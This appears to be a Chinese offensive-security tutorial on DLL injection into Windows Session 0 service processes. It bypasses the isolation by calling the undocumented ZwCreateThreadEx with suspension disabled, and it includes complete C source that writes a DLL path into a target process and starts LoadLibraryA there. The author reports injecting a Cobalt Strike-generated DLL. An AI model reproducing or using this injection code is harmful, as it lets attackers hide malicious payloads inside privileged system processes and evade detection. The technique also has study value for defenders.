一、前言
在Windows XP,Windows Server 2003以及更早的版本中,第一个登录的用户以及Windows的所有服务都运行在Session 0上,这样的做法导致用户使用的应用程序可能会利用Windows的服务程序提升自身的权限,为此,在后续的Windows版本中,引入了一种隔离机制,普通应用程序已经不再session 0中运行。
二、突破SESSION 0 思路
由于SESSION 0隔离机制,导致传统远程线程注入系统服务进程失败。和传统的CreateRemoteThread函数实现的DLL远线程注入的唯一一个区别就是,我们调用的是更为底层的ZwCreateThreadEx来创建线程,
虽然CreateRemoteThread函数到底层也是调用ZwCreateThreadEx,但在调用ZwCreateThreadEx时 ,ZwCreateThreadEx的第7个参数 CreateSuspended(CreateThreadFlags)的值始终为1,它会导致线程创建完成后一直挂起无法恢复运行,于是我们选择直接调用ZwCreateThreadEx,将第7个参数直接置为0,这样可达到注入目的。
三、代码实现
ZwCreateThreadEx在 ntdll.dll 中并没有声明,所以我们需要使用 GetProcAddress 从 ntdll.dll 中获取该函数的导出地址。
我们需要注意的是64位和32位中,函数定义还不一样。
64 位下,ZwCreateThreadEx 函数声明为:
DWORD WINAPI ZwCreateThreadEx( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, ULONG CreateThreadFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, LPVOID pUnkown);
32 位下,ZwCreateThreadEx 函数声明为:
DWORD WINAPI ZwCreateThreadEx( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, BOOL CreateSuspended, DWORD dwStackSize, DWORD dw1, DWORD dw2, LPVOID pUnkown);
同样我们也使用 GetProcAddress 从 Kernel32.dll 中获取LoadLibraryA函数的导出地址
typedef DWORD(WINAPI* typedef_LoadLibraryA)(char* path); HMODULE hKeModule = GetModuleHandleA("Kernel32.dll") typedef_LoadLibraryA myLoadLibraryA = (typedef_LoadLibraryA)GetProcAddress(hKeModule, "LoadLibraryA");
随后,我们获取进程句柄,在目标进程空间中申请内存空间,然后把我们的DLL写入到内存空间中,最后创建线程等待执行。
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 6092); LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), 0); ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL); return 0;
效果如下图:
此处使用的DLL为Cobalt strike生成的64位DLL,最后完整代码如下:
#include <Windows.h> #include <stdio.h> #ifdef _WIN64 typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, ULONG CreateThreadFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, LPVOID pUnkown); #else typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, BOOL CreateSuspended, DWORD dwStackSize, DWORD dw1, DWORD dw2, LPVOID pUnkown); #endif int main(int argc, char* argv[]) { char DllPath[] = "C:\\Users\\RTO\\Desktop\\Injection2\\a.dll"; //DLL路径 HANDLE hRemoteThread; HMODULE hNtModule = GetModuleHandleA("ntdll.dll"); HMODULE hKeModule = GetModuleHandleA("Kernel32.dll"); typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtModule, "ZwCreateThreadEx"); typedef_LoadLibraryA myLoadLibraryA = (typedef_LoadLibraryA)GetProcAddress(hKeModule, "LoadLibraryA"); HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 6092); //此处为SESSION 0的进程PID LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), 0); ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL); return 0; }
四、小结
必须是管理员权限
